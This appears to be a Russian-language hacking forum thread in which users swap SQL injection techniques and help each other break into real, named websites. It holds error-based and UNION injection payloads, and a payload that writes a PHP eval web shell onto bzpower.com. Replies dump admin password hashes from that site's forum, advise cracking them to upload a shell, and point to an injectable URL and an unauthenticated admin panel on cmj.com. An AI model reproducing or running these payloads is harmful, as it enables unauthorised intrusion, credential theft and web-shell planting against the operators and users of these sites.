парочка общих вопросов накопилась 1. по mysql: 1a. Code: +[color=red]or(1,1)[/color]=select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)group+by+2) как выделенная конструкция называется и где о ней можно почитать в доке по mysql ? 1b. Code: SELECT 1 FROM news WHERE id=-1 UNION SELECT * FROM (SELECT * FROM (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14[color=red])d[/color]) as t JOIN (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14[color=red])e) b)a[/color] как выделенные конструкции называются и где об этом можно почитать в доке по mysql ? 2. если есть код вида Code: $GetParam= $_GET["Param"]; $query = "SELECT * FROM TableName WHERE ColunmName ='".$GetParam."'"; $result = mysql_query($query) и magic_quotes_gpc = On то в общем случае сделать ничего нельзя ? [известные мне исключения - "двойной" запрос от Scipio и использование мультибайтовых кодировок (есть в блоге у Raz0r)] еще какие нить варианты есть ?
1. как обойти авторизацию на папку? Например тут: http://cmj.com/admin 2. Как найти полный путь к корню сайта на сервере?
1) Никак 2) Найти ошибку с раскрытием пути. http://prod1.cmj.com/articles/display_article.php?id=179548196+order+by+1-- Вот скуля раскручивай может чего нарулишь там. Угар)) там даже раскручивать не надо )) http://prod1.cmj.com/admin/ Вход в админку без авторизации))
DrakonHaSh https://forum.antichat.ru/thread119047.html и П.С https://forum.antichat.ru/thread104591.html
пользоваться и применять я это умею вникни, пожалуйста, в то, что я спрашиваю: 1. по mysql: 1a. Code: +[color=red]or(1,1)[/color]=select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)group+by+2) как выделенная конструкция называется и где о ней можно почитать в доке по mysql ? 1b. Code: SELECT 1 FROM news WHERE id=-1 UNION SELECT * FROM (SELECT * FROM (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14[color=red])d[/color]) as t JOIN (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14[color=red])e) b)a[/color] как выделенные конструкции называются и где об этом можно почитать в доке по mysql ? 2. если есть код вида Code: $GetParam= $_GET["Param"]; $query = "SELECT * FROM TableName WHERE ColunmName ='".$GetParam."'"; $result = mysql_query($query) и magic_quotes_gpc = On то в общем случае сделать ничего нельзя ? [известные мне исключения - "двойной" запрос от Scipio и использование мультибайтовых кодировок (есть в блоге у Raz0r)] еще какие нить варианты есть ?
ребят кто нибудь из вас имел дело с админским панелем Advanced Poll 2.08 ? и можно ли залить шелл через этот панель?
не могу записать минишел, нужна ваша помощь: http://www.bzpower.com/story.php?ID=-4046+union+select+1,2,3,4,5,'<?php eval($_GET[‘e’]) ?>',7,8,9,10,11,12,13,14+INTO+OUTFILE+'/home/bzpower/public_html/story.php'--
http://www.bzpower.com/story.php?ID=-4046+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+from+mysql.user--+ //лей через форум http://www.bzpower.com/story.php?ID=-4046+union+select+1,2,3,4,5,6,concat_ws(0x3a,converge_id,converge_pass_hash,converge_pass_salt),8,9,10,11,12,13,14+from+ibf_members_converge--+ расшифровываешь хеш админа, заливаешь шелл через админку форума
1 http://dev.mysql.com/doc/refman/5.1/en/row-subqueries.html 2 http://dev.mysql.com/doc/refman/5.0/en/select.html (все что после (A select_expr can be given an alias) 3 нет
нашел инъекцию...пока сам сайт показывать не буду, может быть и так будет понятно, что я хочу=) подобрал колво столбцов site.com/forum.php?id=65+union+select+1,2,3,4,5-- пока все нормально, НО, как только я делаю так: site.com/forum.php?id=-65+union+select+1,2,3,4,5-- или пытаюсь узнать версию site.com/forum.php?id=-65+union+select+version(),2,3,4,5-- то старница обнрвляется и на пару секунд выводится информация, которая мне нужна, то есть принтабельный столбец и версия, а потом через несколько секунд страница сама делает редирект на site.com/login.php но этих пары секунд не достаточно, чтобы например разглядеть все названия столбцов и т.д. как сделать так, чтобы страница сама не обновлялась?
В Google Chrome view-source:http://site.com/forum.php?id=-65+union+select+version(),2,3,4,5-- В других браузерах: в настройках отключить автоматическое перенаправление
Пипл, подскажите скрипт (одним файлом) аналог phpmyadmin. А то весь его заливать на сервер через шел очень долго! И кто подскажет как юзать это http://www.exploit-db.com/list.php?description=SunOS+5.1
